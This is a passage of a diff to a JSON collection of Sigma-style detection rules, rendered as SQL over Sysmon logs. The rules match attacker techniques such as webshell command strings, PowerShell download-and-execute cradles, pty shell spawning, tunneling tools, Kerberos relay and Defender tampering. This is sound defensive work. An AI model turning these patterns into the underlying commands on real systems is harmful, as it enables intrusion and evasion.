LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%-installer.exe' ESCAPE '\\') OR Image LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" + "filename": "proc_creation_win_python_pty_spawn.yml" }, { - "title": "Chopper Webshell Process Pattern", - "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "status": "experimental", - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", - "author": "Florian Roth (Nextron Systems), MSTI (query)", + "title": "Potential LethalHTA Technique Execution", + "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "status": "test", + "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", + "author": "Markus Neis", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.defense_evasion", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_webshell_chopper.yml" + "filename": "proc_creation_win_mshta_lethalhta_technique.yml" }, { - "title": "XSL Script Processing", - "id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", - "status": "test", - "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", - "author": "Timur Zinniatullin, oscd.community", + "title": "Potential Suspicious Windows Feature Enabled - ProcCreation", + "id": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", + "status": "experimental", + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1220" + "attack.defense_evasion" ], "falsepositives": [ - "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", - "Msxsl.exe is not installed by default, so unlikely.", - "Static format arguments - https://petri.com/command-line-wmi-part-3" + "Legitimate usage of the features listed in the rule." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%/format%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%/Format:List%' ESCAPE '\\' OR CommandLine LIKE '%/Format:htable%' ESCAPE '\\' OR CommandLine LIKE '%/Format:hform%' ESCAPE '\\' OR CommandLine LIKE '%/Format:table%' ESCAPE '\\' OR CommandLine LIKE '%/Format:mof%' ESCAPE '\\' OR CommandLine LIKE '%/Format:value%' ESCAPE '\\' OR CommandLine LIKE '%/Format:rawxml%' ESCAPE '\\' OR CommandLine LIKE '%/Format:xml%' ESCAPE '\\' OR CommandLine LIKE '%/Format:csv%' ESCAPE '\\'))) OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND CommandLine LIKE '%-Online%' ESCAPE '\\' AND CommandLine LIKE '%-FeatureName%' ESCAPE '\\' AND (CommandLine LIKE '%TelnetServer%' ESCAPE '\\' OR CommandLine LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR CommandLine LIKE '%TFTP%' ESCAPE '\\' OR CommandLine LIKE '%SMB1Protocol%' ESCAPE '\\' OR CommandLine LIKE '%Client-ProjFS%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_xsl_script_processing.yml" + "filename": "proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" }, { - "title": "Tor Client/Browser Execution", - "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "title": "PUA - Radmin Viewer Utility Execution", + "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", "status": "test", - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\tor.exe' ESCAPE '\\' OR Image LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" ], - "filename": "proc_creation_win_browsers_tor_execution.yml" + "filename": "proc_creation_win_pua_radmin.yml" }, { - "title": "NodejsTools PressAnyKey Lolbin", - "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", + "title": "HackTool - F-Secure C3 Load by Rundll32", + "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", "status": "test", - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "author": "Alfie Champion (ajpc500)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Microsoft.NodejsTools.PressAnyKey.exe normal %' ESCAPE '\\' OR (CommandLine LIKE '%.exe normal %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\Microsoft\\\\NodeJsTools\\\\NodeJsTools%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pressaynkey.yml" + "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" }, { - "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", - "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "title": "HackTool - KrbRelayUp Execution", + "id": "12827a56-61a4-476a-a9cb-f3068f191073", "status": "experimental", - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" + "filename": "proc_creation_win_hktl_krbrelayup.yml" }, { - "title": "Wlrmdr Lolbin Use as Launcher", - "id": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", - "status": "experimental", - "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", - "author": "frack113, manasmbellani", + "title": "File Download with Headless Browser", + "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "status": "test", + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", + "author": "Sreeman, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR (((Image LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR OriginalFileName = 'WLRMNDR.EXE') AND (CommandLine LIKE '%-s %' ESCAPE '\\' AND CommandLine LIKE '%-f %' ESCAPE '\\' AND CommandLine LIKE '%-t %' ESCAPE '\\' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\') OR (ParentImage = '-')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_wlrmdr.yml" + "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" }, { - "title": "ETW Logging Tamper In .NET Processes", - "id": "41421f44-58f9-455d-838a-c398859841d4", + "title": "Potential Arbitrary File Download Via MSEdge.EXE", + "id": "94771a71-ba41-4b6e-a757-b531372eaab6", "status": "test", - "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects usage of the \"msedge.exe\" binary as a LOLBIN to download arbitrary file via the CLI", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR OriginalFileName = 'msedge.exe') AND (CommandLine LIKE '%.exe http%' ESCAPE '\\' OR CommandLine LIKE '%msedge http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" + "filename": "proc_creation_win_browsers_msedge_arbitrary_download.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - ProcessCreation", - "id": "536e2947-3729-478c-9903-745aaffe60d2", + "title": "Tamper Windows Defender Remove-MpPreference", + "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-noni%' ESCAPE '\\' AND CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-ep%' ESCAPE '\\' AND CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-Enc%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-noprofile%' ESCAPE '\\' AND CommandLine LIKE '%-windowstyle%' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%system.net.webclient%' ESCAPE '\\' AND CommandLine LIKE '%.download%' ESCAPE '\\') OR (CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\' AND CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' AND CommandLine LIKE '%.Download%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_invocation_specific.yml" + "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" }, { - "title": "HackTool - Jlaive In-Memory Assembly Execution", - "id": "0a99eb3e-1617-41bd-b095-13dc767f3def", + "title": "Registry Modification Via Regini.EXE", + "id": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", "status": "experimental", - "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate modification of keys" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.bat' ESCAPE '\\') AND ((Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%pwsh.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%+s%' ESCAPE '\\' AND CommandLine LIKE '%+h%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND NOT (CommandLine REGEXP ':[^ \\\\]'))" ], - "filename": "proc_creation_win_hktl_jlaive_batch_execution.yml" + "filename": "proc_creation_win_regini_execution.yml" }, { - "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", + "title": "UAC Bypass WSReset", + "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", "status": "test", - "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", - "author": "Jonhnathan Ribeiro, oscd.community", + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" }, { - "title": "Network Reconnaissance Activity", - "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", - "status": "test", - "description": "Detects a set of suspicious network related commands often used in recon stages", + "title": "PUA - Process Hacker / System Informer Execution", + "id": "811e0002-b13b-4a15-9d00-a613fce66e42", + "status": "experimental", + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" - ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Sometimes used by developers or system administrators for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (Image LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" ], - "filename": "proc_creation_win_nslookup_domain_discovery.yml" + "filename": "proc_creation_win_pua_process_hacker.yml" }, { - "title": "Suspicious Whoami.EXE Execution", - "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Unusually Long PowerShell CommandLine", + "id": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", + "status": "test", + "description": "Detects unusually long PowerShell command lines with a length of 1000 characters or more", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows Powershell' OR Product = 'PowerShell Core 6') AND CommandLine REGEXP '.{1000,}')" ], - "filename": "proc_creation_win_whoami_susp_flags.yml" + "filename": "proc_creation_win_powershell_abnormal_commandline_size.yml" }, { - "title": "Dumping Process via Sqldumper.exe", - "id": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", - "status": "test", - "description": "Detects process dump via legitimate sqldumper.exe binary", - "author": "Kirill Kiryanov, oscd.community", + "title": "Suspicious Electron Application Child Processes", + "id": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", + "status": "experimental", + "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Legitimate MSSQL Server actions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqldumper.exe' ESCAPE '\\' AND (CommandLine LIKE '%0x0110%' ESCAPE '\\' OR CommandLine LIKE '%0x01100:40%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\Teams.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\slack.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\discord.exe' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\Discord.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\NVSMI\\\\nvidia-smi.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml" + "filename": "proc_creation_win_susp_electron_app_children.yml" }, { - "title": "PUA - Chisel Tunneling Tool Execution", - "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", + "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", "status": "experimental", - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Some false positives may occur with other tools with similar commandlines" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_chisel.yml" + "filename": "proc_creation_win_net_use_mount_internet_share.yml" }, { - "title": "Suspicious Msiexec Execute Arbitrary DLL", - "id": 